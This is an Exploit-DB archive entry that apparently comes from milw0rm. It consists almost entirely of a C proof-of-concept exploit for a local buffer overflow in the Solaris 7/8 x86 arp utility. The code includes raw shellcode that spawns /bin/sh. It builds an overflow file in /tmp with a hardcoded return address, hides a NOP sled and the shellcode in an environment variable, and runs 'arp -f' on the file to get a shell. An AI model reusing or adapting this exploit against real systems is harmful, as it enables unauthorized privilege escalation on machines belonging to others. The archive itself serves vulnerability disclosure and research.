Solaris 7/8-beta - ARP Local Overflow

EDB-ID:

250


Author:

ahmed

Type:

local


Platform:

Solaris

Date:

2001-01-15


/*
   arp overflow proof of concept by ahmed@securityfocus.com
   shellcode originally written by Cheez Whiz.

                              tested on x86 solaris 7,8beta
   default should work.  if not, arg1 = offset. +- by 100's

   Copyright Security-Focus.com, 11/2000
*/

long get_esp() { __asm__("movl %esp,%eax"); }

int main(int ac, char **av)
{
  char shell[] =
    "\xeb\x45\x9a\xff\xff\xff\xff\x07\xff"
    "\xc3\x5e\x31\xc0\x89\x46\xb7\x88\x46"
    "\xbc\x88\x46\x07\x89\x46\x0c\x31\xc0"
    "\xb0\x2f\xe8\xe0\xff\xff\xff\x52\x52"
    "\x31\xc0\xb0\xcb\xe8\xd5\xff\xff\xff"
    "\x83\xc4\x08\x31\xc0\x50\x8d\x5e\x08"
    "\x53\x8d\x1e\x89\x5e\x08\x53\xb0\x3b"
    "\xe8\xbe\xff\xff\xff\x83\xc4\x0c\xe8"
    "\xbe\xff\xff\xff\x2f\x62\x69\x6e\x2f"
    "\x73\x68\xff\xff\xff\xff\xff\xff\xff"
    "\xff\xff";

  unsigned long magic = 0x8047b78;
  unsigned long r = get_esp() + 600;
  unsigned char buf[300];
  int f;

  if (ac == 2)
    r += atoi(av[1]);

  memset(buf,0x61,sizeof(buf));
  memcpy(buf+52,&magic,4);
  memcpy(buf+76,&r,4);

  f = open("/tmp/ypx",O_CREAT|O_WRONLY,0600);
  write(f,"1 2 3 4 ",8);
  write(f,buf,sizeof(buf));
  close(f);

  memset(buf,0x90,sizeof(buf));
  memcpy(buf,"LOL=",4);
  memcpy(buf+(sizeof(buf)-strlen(shell)),shell,strlen(shell));
  putenv(buf);

  system("/usr/sbin/arp -f /tmp/ypx");
  unlink("/tmp/ypx");
}


// milw0rm.com [2001-01-15]